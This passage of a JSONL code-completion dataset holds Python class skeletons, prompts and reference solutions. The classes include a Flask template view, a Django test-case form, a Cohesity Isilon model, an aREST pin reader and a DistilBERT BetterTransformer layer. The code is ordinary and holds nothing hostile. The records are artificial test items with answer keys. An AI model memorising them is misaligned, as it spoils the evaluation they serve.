db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n<|end_body_1|>\n\n<|body_start_2|>\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n<|end_body_2|>\n", "revision_id": "29a26c705381fdba3538b4efedb25b9e09b387ed", "skeleton": "<|skeleton|>\nclass TemplateGet:\n\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n <|body_0|>\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n <|body_1|>\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TemplateGet:\n def get(self, template_name):\n \"\"\"Get a specific template\"\"\"\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n return self.make_response({'template': template})\n\n def put(self, template_name):\n \"\"\"Update a template\"\"\"\n self.reqparse.add_argument('template', type=str, required=True)\n args = self.reqparse.parse_args()\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n changes = diff(template.template, args['template'])\n template.template = args['template']\n template.is_modified = True\n db.session.add(template)\n db.session.commit()\n auditlog(event='template.update', actor=session['user'].username, data={'template_name': template_name, 'template_changes': changes})\n return self.make_response('Template {} has been updated'.format(template_name))\n\n def delete(self, template_name):\n \"\"\"Delete a template\"\"\"\n template = db.Template.find_one(template_name=template_name)\n if not template:\n return self.make_response('No such template found', HTTP.NOT_FOUND)\n db.session.delete(template)\n db.session.commit()\n auditlog(event='template.delete', actor=session['user'].username, data={'template_name': template_name})\n return self.make_response({'message': 'Template has been deleted', 'templateName': template_name})\n", "source": "the_stack_v2_python_sparse", "source_path": "backend/cloud_inquisitor/plugins/views/templates.py", "source_repo": "RiotGames/cloud-inquisitor", "split": "test", "star_events_count": 468} {"blob_id": "47ab5ac4fc8f1707236e4b7c785c21d539943c9c", "bodies": ["super(BaseAddCaseForm, self).__init__(*args, **kwargs)\nif self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)", "productversion = self.cleaned_data.get('productversion')\nsuite = self.cleaned_data.get('suite')\nproduct = self.cleaned_data.get('product')\nif product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\nif product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\nreturn self.cleaned_data"], "bodies_text": "<|body_start_0|>\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n<|end_body_0|>\n\n<|body_start_1|>\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n<|end_body_1|>\n", "class_docstring": "Base form for adding cases.", "class_name": "BaseAddCaseForm", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n <|body_0|>\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n<|end_body_0|>\n\n<|body_start_1|>\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000324", "length_bytes": 16711, "license_type": "permissive", "methods": [{"docstring": "Initialize form; possibly add suite field.", "name": "__init__", "signature": "def __init__(self, *args, **kwargs)"}, {"docstring": "Verify that products all match up.", "name": "clean", "signature": "def clean(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006859", "prompt": "Implement the Python class `BaseAddCaseForm` described below.\n\nClass description:\nBase form for adding cases.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Initialize form; possibly add suite field.\n- def clean(self): Verify that products all match up.", "prompted_full_text": "Implement the Python class `BaseAddCaseForm` described below.\n\nClass description:\nBase form for adding cases.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): Initialize form; possibly add suite field.\n- def clean(self): Verify that products all match up.\n\n<|skeleton|>\nclass BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n <|body_0|>\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n<|end_body_0|>\n\n<|body_start_1|>\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n<|end_body_1|>\n", "revision_id": "ee54db2fe8ffbf2216d359b7a093b51f2574878e", "skeleton": "<|skeleton|>\nclass BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n <|body_0|>\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BaseAddCaseForm:\n \"\"\"Base form for adding cases.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize form; possibly add suite field.\"\"\"\n super(BaseAddCaseForm, self).__init__(*args, **kwargs)\n if self.user and self.user.has_perm('library.manage_suite_cases'):\n self.fields['suite'] = mtforms.MTModelChoiceField(model.Suite.objects.all(), choice_attrs=mtforms.product_id_attrs, required=False)\n\n def clean(self):\n \"\"\"Verify that products all match up.\"\"\"\n productversion = self.cleaned_data.get('productversion')\n suite = self.cleaned_data.get('suite')\n product = self.cleaned_data.get('product')\n if product and productversion and (productversion.product != product):\n raise forms.ValidationError('Must select a version of the correct product.')\n if product and suite and (suite.product != product):\n raise forms.ValidationError('Must select a suite for the correct product.')\n return self.cleaned_data\n", "source": "the_stack_v2_python_sparse", "source_path": "moztrap/view/manage/cases/forms.py", "source_repo": "isakib/moztrap", "split": "test", "star_events_count": 1} {"blob_id": "be9af56f449fee7bca8ae45631eb110321075705", "bodies": ["self.access_zone = access_zone\nself.cluster = cluster\nself.mount_point = mount_point\nself.name = name\nself.mtype = mtype", "if dictionary is None:\n return None\naccess_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\ncluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\nmount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\nname = dictionary.get('name')\nmtype = dictionary.get('type')\nreturn cls(access_zone, cluster, mount_point, name, mtype)"], "bodies_text": "<|body_start_0|>\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is", "class_name": "IsilonProtectionSource", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000325", "length_bytes": 3446, "license_type": "permissive", "methods": [{"docstring": "Constructor for the IsilonProtectionSource class", "name": "__init__", "signature": "def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `IsilonProtectionSource` described below.\n\nClass description:\nImplementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\n\nMethod signatures and docstrings:\n- def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None): Constructor for the IsilonProtectionSource class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `IsilonProtectionSource` described below.\n\nClass description:\nImplementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\n\nMethod signatures and docstrings:\n- def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None): Constructor for the IsilonProtectionSource class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/isilon_protection_source.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "40018bf78d0e5152a2446aef1b89ac6e8e35b626", "bodies": ["self._resource = resource\nself._pin = pin\nself.data = {}", "try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\nexcept requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)"], "bodies_text": "<|body_start_0|>\n self._resource = resource\n self._pin = pin\n self.data = {}\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n<|end_body_1|>\n", "class_docstring": "Class for handling the data retrieval for pins.", "class_name": "ArestData", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n <|body_0|>\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._resource = resource\n self._pin = pin\n self.data = {}\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000326", "length_bytes": 3418, "license_type": "permissive", "methods": [{"docstring": "Initialize the aREST data object.", "name": "__init__", "signature": "def __init__(self, resource, pin)"}, {"docstring": "Get the latest data from aREST device.", "name": "update", "signature": "def update(self) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `ArestData` described below.\n\nClass description:\nClass for handling the data retrieval for pins.\n\nMethod signatures and docstrings:\n- def __init__(self, resource, pin): Initialize the aREST data object.\n- def update(self) -> None: Get the latest data from aREST device.", "prompted_full_text": "Implement the Python class `ArestData` described below.\n\nClass description:\nClass for handling the data retrieval for pins.\n\nMethod signatures and docstrings:\n- def __init__(self, resource, pin): Initialize the aREST data object.\n- def update(self) -> None: Get the latest data from aREST device.\n\n<|skeleton|>\nclass ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n <|body_0|>\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._resource = resource\n self._pin = pin\n self.data = {}\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n<|end_body_1|>\n", "revision_id": "80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743", "skeleton": "<|skeleton|>\nclass ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n <|body_0|>\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n self._resource = resource\n self._pin = pin\n self.data = {}\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/arest/binary_sensor.py", "source_repo": "home-assistant/core", "split": "test", "star_events_count": 35501} {"blob_id": "a02aae8b0ad9829c94253ecbd7d633c80ff9b73a", "bodies": ["super().__init__(config)\nself.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\nself.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\nself.out_proj_weight = bert_layer.attention.out_lin.weight\nself.out_proj_bias = bert_layer.attention.out_lin.bias\nself.linear1_weight = bert_layer.ffn.lin1.weight\nself.linear1_bias = bert_layer.ffn.lin1.bias\nself.linear2_weight = bert_layer.ffn.lin2.weight\nself.linear2_bias = bert_layer.ffn.lin2.bias\nself.norm1_eps = bert_layer.sa_layer_norm.eps\nself.norm1_weight = bert_layer.sa_layer_norm.weight\nself.norm1_bias = bert_layer.sa_layer_norm.bias\nself.norm2_eps = bert_layer.output_layer_norm.eps\nself.norm2_weight = bert_layer.output_layer_norm.weight\nself.norm2_bias = bert_layer.output_layer_norm.bias\nself.num_heads = bert_layer.attention.n_heads\nself.embed_dim = bert_layer.attention.dim\nself.is_last_layer = False\nself.validate_bettertransformer()", "super().forward_checker()\nif x.is_nested:\n attn_mask = None\nif attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\nx = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\nif x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\nreturn (x,)"], "bodies_text": "<|body_start_0|>\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n<|end_body_0|>\n\n<|body_start_1|>\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return (x,)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "DistilBertLayerBetterTransformer", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DistilBertLayerBetterTransformer:\n\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n <|body_0|>\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n<|end_body_0|>\n\n<|body_start_1|>\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = 